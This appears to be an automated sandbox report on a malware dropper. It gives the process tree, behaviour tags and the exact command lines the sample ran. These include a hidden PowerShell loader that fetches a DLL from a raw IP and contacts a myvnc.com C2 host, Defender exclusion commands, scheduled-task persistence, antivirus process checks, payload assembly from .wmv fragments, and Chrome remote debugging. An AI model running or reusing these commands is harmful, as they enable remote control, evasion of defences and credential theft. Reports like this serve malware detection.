PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 3856 wrote to memory of 3256	3856	rapes.exe	106
PID 3856 wrote to memory of 3256	3856	rapes.exe	106
PID 3856 wrote to memory of 3256	3856	rapes.exe	106
PID 3256 wrote to memory of 3740	3256	d3jhg_003.exe	107
PID 3256 wrote to memory of 3740	3256	d3jhg_003.exe	107
PID 3256 wrote to memory of 3260	3256	d3jhg_003.exe	108
PID 3256 wrote to memory of 3260	3256	d3jhg_003.exe	108
PID 3740 wrote to memory of 6124	3740	cmd.exe	110
PID 3740 wrote to memory of 6124	3740	cmd.exe	110
PID 3260 wrote to memory of 5764	3260	svchost.exe	111
PID 3260 wrote to memory of 5764	3260	svchost.exe	111
PID 3260 wrote to memory of 792	3260	svchost.exe	112
PID 3260 wrote to memory of 792	3260	svchost.exe	112
PID 3856 wrote to memory of 6412	3856	rapes.exe	114
PID 3856 wrote to memory of 6412	3856	rapes.exe	114
PID 3856 wrote to memory of 6412	3856	rapes.exe	114
PID 3856 wrote to memory of 7296	3856	rapes.exe	122
PID 3856 wrote to memory of 7296	3856	rapes.exe	122
PID 3856 wrote to memory of 7296	3856	rapes.exe	122
PID 6412 wrote to memory of 7840	6412	k3t05Da.exe	124
PID 6412 wrote to memory of 7840	6412	k3t05Da.exe	124
PID 6412 wrote to memory of 7840	6412	k3t05Da.exe	124
PID 6412 wrote to memory of 7944	6412	k3t05Da.exe	126
PID 6412 wrote to memory of 7944	6412	k3t05Da.exe	126
PID 6412 wrote to memory of 7944	6412	k3t05Da.exe	126
PID 6412 wrote to memory of 8028	6412	k3t05Da.exe	128
PID 6412 wrote to memory of 8028	6412	k3t05Da.exe	128
PID 6412 wrote to memory of 8028	6412	k3t05Da.exe	128
PID 3856 wrote to memory of 8184	3856	rapes.exe	130
PID 3856 wrote to memory of 8184	3856	rapes.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
9284	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2556
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:6880

C:\Users\Admin\AppData\Local\Temp\G9UD0_random.exe
"C:\Users\Admin\AppData\Local\Temp\G9UD0_random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3856
- - C:\Users\Admin\AppData\Local\Temp\10299360101\408e0d3c0b.exe
    "C:\Users\Admin\AppData\Local\Temp\10299360101\408e0d3c0b.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:5524
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1016
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2408
- - C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe
    "C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:5304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2968
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\10299390101\d3jhg_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10299390101\d3jhg_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:3256
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6124
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3260
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:5764
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:792
      - C:\Users\Admin\AppData\Local\Temp\{5f80dfa3-101b-4a98-82e1-270606ef3cd3}\251510eb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{5f80dfa3-101b-4a98-82e1-270606ef3cd3}\251510eb.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\{674f470d-9b38-426c-a46a-0636abb7fef7}\3e6778e2.exe
        
        C:/Users/Admin/AppData/Local/Temp/{674f470d-9b38-426c-a46a-0636abb7fef7}/\3e6778e2.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:3916
- - C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe
    "C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:6412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
      4⤵
      Drops startup file
      System Location Discovery: System Language Discovery
      PID:7840
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7944
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3F65.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:8028
  - - C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe
      "C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe"
      4⤵
      Executes dropped EXE
      PID:4856
  - - C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe
      "C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4852
- - C:\Users\Admin\AppData\Local\Temp\10299410101\wjfOfXh.exe
    "C:\Users\Admin\AppData\Local\Temp\10299410101\wjfOfXh.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:7296
- - C:\Users\Admin\AppData\Local\Temp\10299420101\ARxx7NW.exe
    "C:\Users\Admin\AppData\Local\Temp\10299420101\ARxx7NW.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:8184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5604
  - - C:\Program Files\RuntimeApp\0000004419.exe
      "C:\Program Files\RuntimeApp\0000004419.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:9164
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10299430141\4wAPcC0.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5244
  - - C:\Windows\system32\windowspowershell\v1.0\powershell.exe
      "C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7208
- - C:\Users\Admin\AppData\Local\Temp\10299440101\OkH8IPF.exe
    "C:\Users\Admin\AppData\Local\Temp\10299440101\OkH8IPF.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:13164
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6616
- - C:\Users\Admin\AppData\Local\Temp\10299450101\50KfF6O.exe
    "C:\Users\Admin\AppData\Local\Temp\10299450101\50KfF6O.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:9124
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\10299450101\50KfF6O.exe
      4⤵
      Views/modifies file attributes
      PID:9284
- - C:\Users\Admin\AppData\Local\Temp\10299460101\zx4PJh6.exe
    "C:\Users\Admin\AppData\Local\Temp\10299460101\zx4PJh6.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:8344
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:10088
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:13300
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2920
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:12508
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7068
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7280
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6104
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3512
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4780
    - - C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6256
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 932
        6⤵
        Program crash
        
        PID:5080
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7700
- - C:\Users\Admin\AppData\Local\Temp\10299470101\Kr9UTz2.exe
    "C:\Users\Admin\AppData\Local\Temp\10299470101\Kr9UTz2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:7352
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6580
- - C:\Users\Admin\AppData\Local\Temp\10299480101\weC48Q7.exe
    "C:\Users\Admin\AppData\Local\Temp\10299480101\weC48Q7.exe"
    3⤵
    - Executes dropped EXE
    PID:5836
  - - C:\Users\Admin\AppData\Local\Temp\onefile_5836_133871223535309850\windowscore.exe
      C:\Users\Admin\AppData\Local\Temp\10299480101\weC48Q7.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4840
- - C:\Users\Admin\AppData\Local\Temp\10299490101\767eec0559.exe
    "C:\Users\Admin\AppData\Local\Temp\10299490101\767eec0559.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:9276
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:10612
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffafa38dcf8,0x7ffafa38dd04,0x7ffafa38dd10
        5⤵
        
        PID:10772
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1912,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1728 /prefetch:2
        5⤵
        
        PID:13112
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1556,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2184 /prefetch:3
        5⤵
        
        PID:6840
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2308,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2324 /prefetch:8
        5⤵
        
        PID:7544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4780
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3408,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3436 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1820
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4328,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2376 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:2008
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12764276057866306343,1590640231172674937,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4584 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:9952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffafa38dcf8,0x7ffafa38dd04,0x7ffafa38dd10
        5⤵
        
        PID:10024
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1972,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1968 /prefetch:2
        5⤵
        
        PID:12040
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2220,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2228 /prefetch:3
        5⤵
        
        PID:1552
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2360 /prefetch:8
        5⤵
        
        PID:12972
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:10816
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:10864
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4268 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:11316
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4184 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:11592
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5124,i,5806198636284409270,15548833337921938031,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5152 /prefetch:8
        5⤵
        
        PID:12368
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:9324
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffafa38dcf8,0x7ffafa38dd04,0x7ffafa38dd10
        5⤵
        
        PID:9052
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1536,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=2440 /prefetch:3
        5⤵
        
        PID:4352
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
